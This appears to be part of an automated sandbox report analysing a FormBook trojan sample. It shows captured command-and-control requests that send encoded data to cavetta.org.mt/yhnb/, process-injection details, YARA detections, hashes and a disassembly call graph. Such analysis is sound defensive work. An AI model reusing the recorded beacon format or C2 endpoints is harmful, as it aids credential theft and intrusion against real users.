                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 236
                                                          Host: www.cavetta.org.mt
                                                          Origin: http://www.cavetta.org.mt
                                                          Referer: http://www.cavetta.org.mt/yhnb/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 78 34 7a 38 4c 43 4b 33 6f 68 34 35 65 30 37 4f 39 51 69 4a 5a 4a 63 38 44 71 33 45 74 41 32 2f 6f 66 54 41 4a 62 7a 59 4a 54 6d 53 79 2f 46 31 58 7a 54 45 67 7a 30 57 4b 76 78 32 71 79 34 62 54 52 73 79 6a 64 53 54 59 30 4c 2b 30 45 61 58 6c 72 33 31 44 6b 72 59 4b 2b 43 6c 66 77 75 42 42 43 69 41 61 66 75 64 4a 30 36 4c 71 34 6b 4f 75 35 53 56 6e 75 43 79 2b 6e 73 39 41 5a 30 55 49 32 55 32 75 4a 68 79 56 56 32 70 54 55 58 43 32 69 54 2f 43 62 41 42 38 2b 6a 33 42 5a 2f 36 4f 76 62 6f 71 6b 73 6c 2b 75 32 76 4a 37 4e 73 65 66 74 52 56 65 30 31 49 30 4a 77 63 46 6e 4c 39 33 75 6c 44 54 74 76 32 54 4d 77 32 38 6a 54 4d 67 43 72 4f 2f 51 62 46 6d 35 66 35 68 39 44 7a 51 3d 3d
                                                          Data Ascii: GBbljTO=x4z8LCK3oh45e07O9QiJZJc8Dq3EtA2/ofTAJbzYJTmSy/F1XzTEgz0WKvx2qy4bTRsyjdSTY0L+0EaXlr31DkrYK+ClfwuBBCiAafudJ06Lq4kOu5SVnuCy+ns9AZ0UI2U2uJhyVV2pTUXC2iT/CbAB8+j3BZ/6Ovboqksl+u2vJ7NseftRVe01I0JwcFnL93ulDTtv2TMw28jTMgCrO/QbFm5f5h9DzQ==


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          47192.168.2.649771188.114.97.380280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:05:54.587625980 CEST1789OUTPOST /yhnb/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 1248
                                                          Host: www.cavetta.org.mt
                                                          Origin: http://www.cavetta.org.mt
                                                          Referer: http://www.cavetta.org.mt/yhnb/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 78 34 7a 38 4c 43 4b 33 6f 68 34 35 65 30 37 4f 39 51 69 4a 5a 4a 63 38 44 71 33 45 74 41 32 2f 6f 66 54 41 4a 62 7a 59 4a 54 75 53 78 4f 6c 31 56 55 76 45 75 54 30 57 4a 76 78 37 71 79 34 47 54 58 45 2b 6a 63 76 6f 59 33 6a 2b 30 69 47 58 69 66 62 31 4a 6b 72 59 49 2b 43 67 51 51 76 44 42 43 79 45 61 66 2b 64 4a 30 36 4c 71 36 73 4f 73 72 71 56 6c 75 43 31 6f 58 73 78 52 4a 30 34 49 32 4d 4d 75 4a 56 49 56 6c 57 70 53 30 6e 43 30 51 37 2f 4f 62 41 35 2f 2b 6a 76 42 5a 7a 35 4f 75 7a 6b 71 6c 59 44 2b 6f 4b 76 4d 2b 6f 44 42 2f 6b 47 58 4e 59 47 55 32 5a 68 53 46 2f 70 39 55 53 38 41 52 77 59 38 51 6b 37 33 49 33 61 4f 6d 48 67 4a 50 64 37 47 43 49 71 76 52 73 7a 6d 65 6e 34 45 6f 4f 6d 2b 31 35 58 57 6e 6e 56 64 7a 55 52 44 44 54 74 32 69 30 33 65 32 54 50 36 67 49 46 56 6b 41 50 79 71 38 48 57 75 58 2b 45 34 32 31 2b 38 59 6a 64 37 33 2b 36 53 69 76 79 32 79 56 53 7a 61 57 59 34 75 68 4c 37 4d 4a 39 64 71 57 49 7a 54 75 4e 47 4d 35 4f 4c 7a 72 65 63 79 63 2f 78 63 42 4d 4f [TRUNCATED]
                                                          Data Ascii: GBbljTO=x4z8LCK3oh45e07O9QiJZJc8Dq3EtA2/ofTAJbzYJTuSxOl1VUvEuT0WJvx7qy4GTXE+jcvoY3j+0iGXifb1JkrYI+CgQQvDBCyEaf+dJ06Lq6sOsrqVluC1oXsxRJ04I2MMuJVIVlWpS0nC0Q7/ObA5/+jvBZz5OuzkqlYD+oKvM+oDB/kGXNYGU2ZhSF/p9US8ARwY8Qk73I3aOmHgJPd7GCIqvRszmen4EoOm+15XWnnVdzURDDTt2i03e2TP6gIFVkAPyq8HWuX+E421+8Yjd73+6Sivy2yVSzaWY4uhL7MJ9dqWIzTuNGM5OLzrecyc/xcBMOeu22VI0Svqamr5RiIbq0YqQMutdzVuQ0Y/RRkZxjnjKpDWwtOLksK+KdxgLWiXabodlBCETjxTO3gCH1OTHlK5P7wt7ltuj6NoGG63XkQDvEFbBne7pjLK73aSdMjvOQ1oT2zp6BDwm/VOU8xdfg1g0qPIpFszrgxhNCxFlhxEFAO+SXAxpsFB984zSfCFZSI6xoEsi/y3+1yn+1EnB8CWW73ZlWOGp1qgXLCIMXAu+09/aJ6AzJIyhDik5WKqOIYLmnN9/NZHjfy8wVLFAjksdw4JMX8pcqc3+3/UWL7vMnwJWKkYisyf6ZqrpM5336cPUrsaXj3g4w6Dz5oZyjAK9vDCOGRQ5O+slY7+ORD5UUpNkRKmNH7plOvNaeKFQxpMV+gtgTvn7hpORhBAv1WSg/AkxtN40yWmPFbOTlEjoA05q2dbmTMda8HROGFg/MA1J+4m0eazHxkVn7pNT+xdRdO5LhxvInirhIAkaynzXGQRWldRHAqWr3bgI23bo4nzyTV9i2CifWoubcnA1a8b7ntggi3xobiJXIFAMbLT3vCFcVMOWu9aAzGQBRAAR7p4+Jp6gqOx03WBT8HFM06K2G4EW42mP/EKjeho5jL84zMjaUuaugWd/4+z8fN48jdJAWSDak1DtzJcf30UXzjkXV5oEcXJbTK8 [TRUNCATED]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          48192.168.2.649772188.114.97.380280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:05:57.280318975 CEST484OUTGET /yhnb/?GBbljTO=86bcI2qL6Ck2EEXjt07/da0+FqeEti6E2PrLBpyTIXPFyvdDByTjqw0HMrkRgwgyVhVHjteWGV6y9HyWgZi3RwvVIvWEZBOaOAOWOeC1I2qg94IuubjyoeGZ/2oiDpUvJToX5v0=&mB=rL4lP HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.cavetta.org.mt
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Jul 2, 2024 14:05:59.260705948 CEST1074INHTTP/1.1 301 Moved Permanently
                                                          Date: Tue, 02 Jul 2024 12:05:59 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          x-powered-by: PHP/7.4.33
                                                          set-cookie: qtrans_front_language=en; expires=Wed, 02-Jul-2025 12:05:58 GMT; Max-Age=31536000; path=/
                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          cache-control: no-cache, must-revalidate, max-age=0
                                                          x-redirect-by: WordPress
                                                          location: http://cavetta.org.mt/yhnb/?GBbljTO=86bcI2qL6Ck2EEXjt07/da0+FqeEti6E2PrLBpyTIXPFyvdDByTjqw0HMrkRgwgyVhVHjteWGV6y9HyWgZi3RwvVIvWEZBOaOAOWOeC1I2qg94IuubjyoeGZ/2oiDpUvJToX5v0=&mB=rL4lP
                                                          x-turbo-charged-by: LiteSpeed
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zlMuYB2%2Boe5YrtX0b9Gv8XzJMo%2BhMsQX2BcUWgKHS2iob3I8XO%2BqXgdTDvudNBjBU%2BPoHTfqS24WNIgVWiVsDEE%2FVKqBfGznbchr4taMp9gUdpmd90MhVXchXuHPheBzyWAmdgM%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 89ce81cbcff47cfa-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:1
                                                          Start time:08:01:53
                                                          Start date:02/07/2024
                                                          Path:C:\Users\user\Desktop\hkLFB22XxS.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\hkLFB22XxS.exe"
                                                          Imagebase:0x810000
                                                          File size:1'233'920 bytes
                                                          MD5 hash:46D91DBE786E1518A8715E29F5FBA781
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:2
                                                          Start time:08:01:54
                                                          Start date:02/07/2024
                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\hkLFB22XxS.exe"
                                                          Imagebase:0xa00000
                                                          File size:46'504 bytes
                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2571476306.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2571476306.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2571552452.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2571552452.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2572095157.0000000004000000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2572095157.0000000004000000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:7
                                                          Start time:08:02:33
                                                          Start date:02/07/2024
                                                          Path:C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe"
                                                          Imagebase:0xa00000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4578971846.0000000003210000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4578971846.0000000003210000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:8
                                                          Start time:08:02:34
                                                          Start date:02/07/2024
                                                          Path:C:\Windows\SysWOW64\convert.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\convert.exe"
                                                          Imagebase:0x310000
                                                          File size:19'456 bytes
                                                          MD5 hash:2B1AC34AB72C95793CFE7E936F15389D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4571790070.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4571790070.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4568789406.0000000000230000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4568789406.0000000000230000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4571023463.0000000002870000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4571023463.0000000002870000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          Reputation:moderate
                                                          Has exited:false

                                                          General

                                                          Target ID:10
                                                          Start time:08:02:47
                                                          Start date:02/07/2024
                                                          Path:C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe"
                                                          Imagebase:0xa00000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4580723330.0000000005200000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.4580723330.0000000005200000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:11
                                                          Start time:08:02:59
                                                          Start date:02/07/2024
                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                          Imagebase:0x7ff728280000
                                                          File size:676'768 bytes
                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:4.1%
                                                            Dynamic/Decrypted Code Coverage:0.4%
                                                            Signature Coverage:2.9%
                                                            Total number of Nodes:2000
                                                            Total number of Limit Nodes:174
                                                            execution_graph 98124 837e93 98125 837e9f __wfsopen 98124->98125 98161 83a048 GetStartupInfoW 98125->98161 98127 837ea4 98163 838dbc GetProcessHeap 98127->98163 98129 837efc 98130 837f07 98129->98130 98246 837fe3 58 API calls 3 library calls 98129->98246 98164 839d26 98130->98164 98133 837f0d 98134 837f18 __RTC_Initialize 98133->98134 98247 837fe3 58 API calls 3 library calls 98133->98247 98185 83d812 98134->98185 98137 837f27 98138 837f33 GetCommandLineW 98137->98138 98248 837fe3 58 API calls 3 library calls 98137->98248 98204 845173 GetEnvironmentStringsW 98138->98204 98141 837f32 98141->98138 98144 837f4d 98145 837f58 98144->98145 98249 8332f5 58 API calls 3 library calls 98144->98249 98214 844fa8 98145->98214 98148 837f5e 98149 837f69 98148->98149 98250 8332f5 58 API calls 3 library calls 98148->98250 98228 83332f 98149->98228 98152 837f71 98153 837f7c __wwincmdln 98152->98153 98251 8332f5 58 API calls 3 library calls 98152->98251 98234 81492e 98153->98234 98156 837f90 98157 837f9f 98156->98157 98252 833598 58 API calls _doexit 98156->98252 98253 833320 58 API calls _doexit 98157->98253 98160 837fa4 __wfsopen 98162 83a05e 98161->98162 98162->98127 98163->98129 98254 8333c7 36 API calls 2 library calls 98164->98254 98166 839d2b 98255 839f7c InitializeCriticalSectionAndSpinCount __mtinitlocks 98166->98255 98168 839d30 98169 839d34 98168->98169 98257 839fca TlsAlloc 98168->98257 98256 839d9c 61 API calls 2 library calls 98169->98256 98172 839d39 98172->98133 98173 839d46 98173->98169 98174 839d51 98173->98174 98258 838a15 98174->98258 98177 839d93 98266 839d9c 61 API calls 2 library calls 98177->98266 98180 839d98 98180->98133 98181 839d72 98181->98177 98182 839d78 98181->98182 98265 839c73 58 API calls 4 library calls 98182->98265 98184 839d80 GetCurrentThreadId 98184->98133 98186 83d81e __wfsopen 98185->98186 98278 839e4b 98186->98278 98188 83d825 98189 838a15 __calloc_crt 58 API calls 98188->98189 98191 83d836 98189->98191 98190 83d8a1 GetStartupInfoW 98198 83d8b6 98190->98198 98199 83d9e5 98190->98199 98191->98190 98192 83d841 __wfsopen @_EH4_CallFilterFunc@8 98191->98192 98192->98137 98193 83daad 98287 83dabd LeaveCriticalSection _doexit 98193->98287 98195 838a15 __calloc_crt 58 API calls 98195->98198 98196 83da32 GetStdHandle 98196->98199 98197 83da45 GetFileType 98197->98199 98198->98195 98198->98199 98200 83d904 98198->98200 98199->98193 98199->98196 98199->98197 98286 83a06b InitializeCriticalSectionAndSpinCount 98199->98286 98200->98199 98201 83d938 GetFileType 98200->98201 98285 83a06b InitializeCriticalSectionAndSpinCount 98200->98285 98201->98200 98205 837f43 98204->98205 98206 845184 98204->98206 98210 844d6b GetModuleFileNameW 98205->98210 98327 838a5d 58 API calls 2 library calls 98206->98327 98208 8451aa _memmove 98209 8451c0 FreeEnvironmentStringsW 98208->98209 98209->98205 98211 844d9f _wparse_cmdline 98210->98211 98213 844ddf _wparse_cmdline 98211->98213 98328 838a5d 58 API calls 2 library calls 98211->98328 98213->98144 98215 844fc1 __wsetenvp 98214->98215 98219 844fb9 98214->98219 98216 838a15 __calloc_crt 58 API calls 98215->98216 98224 844fea __wsetenvp 98216->98224 98217 845041 98218 832f95 _free 58 API calls 98217->98218 98218->98219 98219->98148 98220 838a15 __calloc_crt 58 API calls 98220->98224 98221 845066 98222 832f95 _free 58 API calls 98221->98222 98222->98219 98224->98217 98224->98219 98224->98220 98224->98221 98225 84507d 98224->98225 98329 844857 58 API calls __wfsopen 98224->98329 98330 839006 IsProcessorFeaturePresent 98225->98330 98227 845089 98227->98148 98229 83333b __IsNonwritableInCurrentImage 98228->98229 98353 83a711 98229->98353 98231 833359 __initterm_e 98233 833378 _doexit __IsNonwritableInCurrentImage 98231->98233 98356 832f80 98231->98356 98233->98152 98235 8149e7 98234->98235 98236 814948 98234->98236 98235->98156 98237 814982 IsThemeActive 98236->98237 98391 8335ac 98237->98391 98241 8149ae 98403 814a5b SystemParametersInfoW SystemParametersInfoW 98241->98403 98243 8149ba 98404 813b4c 98243->98404 98245 8149c2 SystemParametersInfoW 98245->98235 98246->98130 98247->98134 98248->98141 98252->98157 98253->98160 98254->98166 98255->98168 98256->98172 98257->98173 98260 838a1c 98258->98260 98261 838a57 98260->98261 98263 838a3a 98260->98263 98267 845446 98260->98267 98261->98177 98264 83a026 TlsSetValue 98261->98264 98263->98260 98263->98261 98275 83a372 Sleep 98263->98275 98264->98181 98265->98184 98266->98180 98268 845451 98267->98268 98274 84546c 98267->98274 98269 84545d 98268->98269 98268->98274 98276 838d68 58 API calls __getptd_noexit 98269->98276 98271 84547c HeapAlloc 98272 845462 98271->98272 98271->98274 98272->98260 98274->98271 98274->98272 98277 8335e1 DecodePointer 98274->98277 98275->98263 98276->98272 98277->98274 98279 839e6f EnterCriticalSection 98278->98279 98280 839e5c 98278->98280 98279->98188 98288 839ed3 98280->98288 98282 839e62 98282->98279 98312 8332f5 58 API calls 3 library calls 98282->98312 98285->98200 98286->98199 98287->98192 98289 839edf __wfsopen 98288->98289 98290 839f00 98289->98290 98291 839ee8 98289->98291 98297 839f21 __wfsopen 98290->98297 98316 838a5d 58 API calls 2 library calls 98290->98316 98313 83a3ab 58 API calls __NMSG_WRITE 98291->98313 98293 839eed 98314 83a408 58 API calls 6 library calls 98293->98314 98296 839f15 98299 839f2b 98296->98299 98300 839f1c 98296->98300 98297->98282 98298 839ef4 98315 8332df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98298->98315 98302 839e4b __lock 58 API calls 98299->98302 98317 838d68 58 API calls __getptd_noexit 98300->98317 98304 839f32 98302->98304 98306 839f57 98304->98306 98307 839f3f 98304->98307 98319 832f95 98306->98319 98318 83a06b InitializeCriticalSectionAndSpinCount 98307->98318 98310 839f4b 98325 839f73 LeaveCriticalSection _doexit 98310->98325 98313->98293 98314->98298 98316->98296 98317->98297 98318->98310 98320 832fc7 __dosmaperr 98319->98320 98321 832f9e RtlFreeHeap 98319->98321 98320->98310 98321->98320 98322 832fb3 98321->98322 98326 838d68 58 API calls __getptd_noexit 98322->98326 98324 832fb9 GetLastError 98324->98320 98325->98297 98326->98324 98327->98208 98328->98213 98329->98224 98331 839011 98330->98331 98336 838e99 98331->98336 98335 83902c 98335->98227 98337 838eb3 _memset __call_reportfault 98336->98337 98338 838ed3 IsDebuggerPresent 98337->98338 98344 83a395 SetUnhandledExceptionFilter UnhandledExceptionFilter 98338->98344 98341 838f97 __call_reportfault 98345 83c836 98341->98345 98342 838fba 98343 83a380 GetCurrentProcess TerminateProcess 98342->98343 98343->98335 98344->98341 98346 83c840 IsProcessorFeaturePresent 98345->98346 98347 83c83e 98345->98347 98349 845b5a 98346->98349 98347->98342 98352 845b09 5 API calls 2 library calls 98349->98352 98351 845c3d 98351->98342 98352->98351 98354 83a714 EncodePointer 98353->98354 98354->98354 98355 83a72e 98354->98355 98355->98231 98359 832e84 98356->98359 98358 832f8b 98358->98233 98360 832e90 __wfsopen 98359->98360 98367 833457 98360->98367 98366 832eb7 __wfsopen 98366->98358 98368 839e4b __lock 58 API calls 98367->98368 98369 832e99 98368->98369 98370 832ec8 DecodePointer DecodePointer 98369->98370 98371 832ea5 98370->98371 98372 832ef5 98370->98372 98381 832ec2 98371->98381 98372->98371 98384 8389e4 59 API calls __wfsopen 98372->98384 98374 832f58 EncodePointer EncodePointer 98374->98371 98375 832f2c 98375->98371 98380 832f46 EncodePointer 98375->98380 98386 838aa4 61 API calls __realloc_crt 98375->98386 98376 832f07 98376->98374 98376->98375 98385 838aa4 61 API calls __realloc_crt 98376->98385 98379 832f40 98379->98371 98379->98380 98380->98374 98387 833460 98381->98387 98384->98376 98385->98375 98386->98379 98390 839fb5 LeaveCriticalSection 98387->98390 98389 832ec7 98389->98366 98390->98389 98392 839e4b __lock 58 API calls 98391->98392 98393 8335b7 DecodePointer EncodePointer 98392->98393 98456 839fb5 LeaveCriticalSection 98393->98456 98395 8149a7 98396 833614 98395->98396 98397 833638 98396->98397 98398 83361e 98396->98398 98397->98241 98398->98397 98457 838d68 58 API calls __getptd_noexit 98398->98457 98400 833628 98458 838ff6 9 API calls __wfsopen 98400->98458 98402 833633 98402->98241 98403->98243 98405 813b59 __write_nolock 98404->98405 98459 8177c7 98405->98459 98409 813b8c IsDebuggerPresent 98410 84d4ad MessageBoxA 98409->98410 98411 813b9a 98409->98411 98413 84d4c7 98410->98413 98411->98413 98414 813bb7 98411->98414 98442 813c73 98411->98442 98412 813c7a SetCurrentDirectoryW 98415 813c87 Mailbox 98412->98415 98683 817373 59 API calls Mailbox 98413->98683 98545 8173e5 98414->98545 98415->98245 98418 84d4d7 98423 84d4ed SetCurrentDirectoryW 98418->98423 98420 813bd5 GetFullPathNameW 98561 817d2c 98420->98561 98422 813c10 98570 820a8d 98422->98570 98423->98415 98426 813c2e 98427 813c38 98426->98427 98684 874c03 AllocateAndInitializeSid CheckTokenMembership FreeSid 98426->98684 98586 813a58 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 98427->98586 98430 84d50a 98430->98427 98433 84d51b 98430->98433 98685 814864 98433->98685 98434 813c42 98436 813c55 98434->98436 98594 8143db 98434->98594 98605 820b30 98436->98605 98442->98412 98456->98395 98457->98400 98458->98402 98712 830ff6 98459->98712 98461 8177e8 98462 830ff6 Mailbox 59 API calls 98461->98462 98463 813b63 GetCurrentDirectoryW 98462->98463 98464 813778 98463->98464 98465 8177c7 59 API calls 98464->98465 98466 81378e 98465->98466 98750 813d43 98466->98750 98468 8137ac 98469 814864 61 API calls 98468->98469 98470 8137c0 98469->98470 98471 817f41 59 API calls 98470->98471 98472 8137cd 98471->98472 98764 814f3d 98472->98764 98475 84d3ae 98835 8797e5 98475->98835 98476 8137ee Mailbox 98788 8181a7 98476->98788 98479 84d3cd 98482 832f95 _free 58 API calls 98479->98482 98484 84d3da 98482->98484 98486 814faa 84 API calls 98484->98486 98488 84d3e3 98486->98488 98493 813ee2 59 API calls 98488->98493 98489 817f41 59 API calls 98490 81381a 98489->98490 98795 818620 98490->98795 98492 81382c Mailbox 98495 817f41 59 API calls 98492->98495 98494 84d3fe 98493->98494 98496 813ee2 59 API calls 98494->98496 98497 813852 98495->98497 98498 84d41a 98496->98498 98499 818620 69 API calls 98497->98499 98500 814864 61 API calls 98498->98500 98502 813861 Mailbox 98499->98502 98501 84d43f 98500->98501 98503 813ee2 59 API calls 98501->98503 98505 8177c7 59 API calls 98502->98505 98504 84d44b 98503->98504 98506 8181a7 59 API calls 98504->98506 98507 81387f 98505->98507 98508 84d459 98506->98508 98799 813ee2 98507->98799 98510 813ee2 59 API calls 98508->98510 98512 84d468 98510->98512 98518 8181a7 59 API calls 98512->98518 98514 813899 98514->98488 98515 8138a3 98514->98515 98516 83313d _W_store_winword 60 API calls 98515->98516 98517 8138ae 98516->98517 98517->98494 98519 8138b8 98517->98519 98520 84d48a 98518->98520 98521 83313d _W_store_winword 60 API calls 98519->98521 98522 813ee2 59 API calls 98520->98522 98523 8138c3 98521->98523 98524 84d497 98522->98524 98523->98498 98525 8138cd 98523->98525 98524->98524 98526 83313d _W_store_winword 60 API calls 98525->98526 98527 8138d8 98526->98527 98527->98512 98528 813919 98527->98528 98530 813ee2 59 API calls 98527->98530 98528->98512 98529 813926 98528->98529 98815 81942e 98529->98815 98532 8138fc 98530->98532 98534 8181a7 59 API calls 98532->98534 98536 81390a 98534->98536 98537 813ee2 59 API calls 98536->98537 98537->98528 98540 8193ea 59 API calls 98542 813961 98540->98542 98541 819040 60 API calls 98541->98542 98542->98540 98542->98541 98543 8139a7 Mailbox 98542->98543 98544 813ee2 59 API calls 98542->98544 98543->98409 98544->98542 98546 8173f2 __write_nolock 98545->98546 98547 81740b 98546->98547 98549 84ee4b _memset 98546->98549 99638 8148ae 98547->99638 98551 84ee67 GetOpenFileNameW 98549->98551 98553 84eeb6 98551->98553 98555 817d2c 59 API calls 98553->98555 98557 84eecb 98555->98557 98557->98557 98558 817429 99666 8169ca 98558->99666 98562 817da5 98561->98562 98563 817d38 __wsetenvp 98561->98563 98564 817e8c 59 API calls 98562->98564 98565 817d73 98563->98565 98566 817d4e 98563->98566 98569 817d56 _memmove 98564->98569 98568 818189 59 API calls 98565->98568 98567 818087 59 API calls 98566->98567 98567->98569 98568->98569 98569->98422 98571 820a9a __write_nolock 98570->98571 100003 816ee0 98571->100003 98573 820a9f 98574 813c26 98573->98574 100014 8212fe 89 API calls 98573->100014 98574->98418 98574->98426 98576 820aac 98576->98574 100015 824047 91 API calls Mailbox 98576->100015 98578 820ab5 98578->98574 98579 820ab9 GetFullPathNameW 98578->98579 98580 817d2c 59 API calls 98579->98580 98581 820ae5 98580->98581 98582 817d2c 59 API calls 98581->98582 98583 820af2 98582->98583 98584 817d2c 59 API calls 98583->98584 98585 8550d5 _wcscat 98583->98585 98584->98574 98587 813ac2 LoadImageW RegisterClassExW 98586->98587 98588 84d49c 98586->98588 100053 813041 7 API calls 98587->100053 100054 8148fe LoadImageW EnumResourceNamesW 98588->100054 98591 813b46 98593 8139e7 